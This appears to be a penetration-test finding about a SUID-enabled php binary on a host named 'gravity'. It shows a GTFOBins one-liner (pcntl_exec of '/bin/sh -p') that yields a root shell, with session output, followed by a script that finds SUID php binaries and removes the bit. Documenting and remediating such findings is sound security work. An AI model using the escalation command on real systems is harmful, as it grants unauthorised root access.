SUID php


The php binary was identified as having the SUID bit set. This was confirmed by PEAS at a later stage.

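According to GTFOBins, php can be abused for privilege escalation. In the session below, pcntl_exec replaces the php process with /bin/sh, and the -p flag keeps the shell from dropping the effective UID it inherits from the SUID bit.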

www-data@gravity:~$ CMD="/bin/sh"
www-data@gravity:~$ /usr/bin/php7.4 -r "pcntl_exec('/bin/sh', ['-p']);"
whoami
root
hostname
gravity
ifconfig
/bin/sh: 3: ifconfig: not found
/sbin/ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.154.12  netmask 255.255.255.0  broadcast 192.168.154.255
        ether 00:50:56:9e:67:3a  txqueuelen 1000  (Ethernet)
        RX packets 1822807  bytes 193292722 (193.2 MB)
        RX errors 0  dropped 498  overruns 0  frame 0
        TX packets 1525939  bytes 1276643003 (1.2 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 3426  bytes 328534 (328.5 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 3426  bytes 328534 (328.5 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System level compromise
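
Remediation check for this finding, as an added example that is not part of the original notes: it lists SUID files named like the php CLI (such as the /usr/bin/php7.4 above) and removes the bit. The function names, the DRY_RUN variable and the 'php*' name pattern are assumptions of this example, and it relies on GNU find and stat.

```shell
#!/bin/sh
# Added example: audit and remediate set-uid PHP interpreters.
# Usage (paths are examples): sh audit_suid_php.sh /usr/bin /usr/local/bin
# Set DRY_RUN=0 to actually change file modes; the default only reports.

# Print "mode owner path" for every regular file under the given roots
# that has the SUID bit (04000) set and whose name starts with "php".
find_suid_php() {
    find "$@" -xdev -type f -perm -4000 -name 'php*' \
        -exec stat -c '%a %U %n' {} + 2>/dev/null
}

# Remove the SUID bit from each finding. An interpreter never needs it:
# any script or -r one-liner it runs would execute with the owner's
# effective UID, which is what the session above shows.
strip_suid_php() {
    find_suid_php "$@" | while read -r mode owner path; do
        [ -n "$path" ] || continue
        if [ "${DRY_RUN:-1}" = 1 ]; then
            echo "would run: chmod u-s $path (mode $mode, owner $owner)"
        else
            chmod u-s -- "$path" && echo "removed SUID: $path"
        fi
    done
}

# Run only when search roots are given on the command line.
if [ "$#" -gt 0 ]; then
    strip_suid_php "$@"
fi
```

The name match will not catch a SUID copy of the interpreter saved under another name, so a full `find / -xdev -perm -4000` review is still needed alongside it.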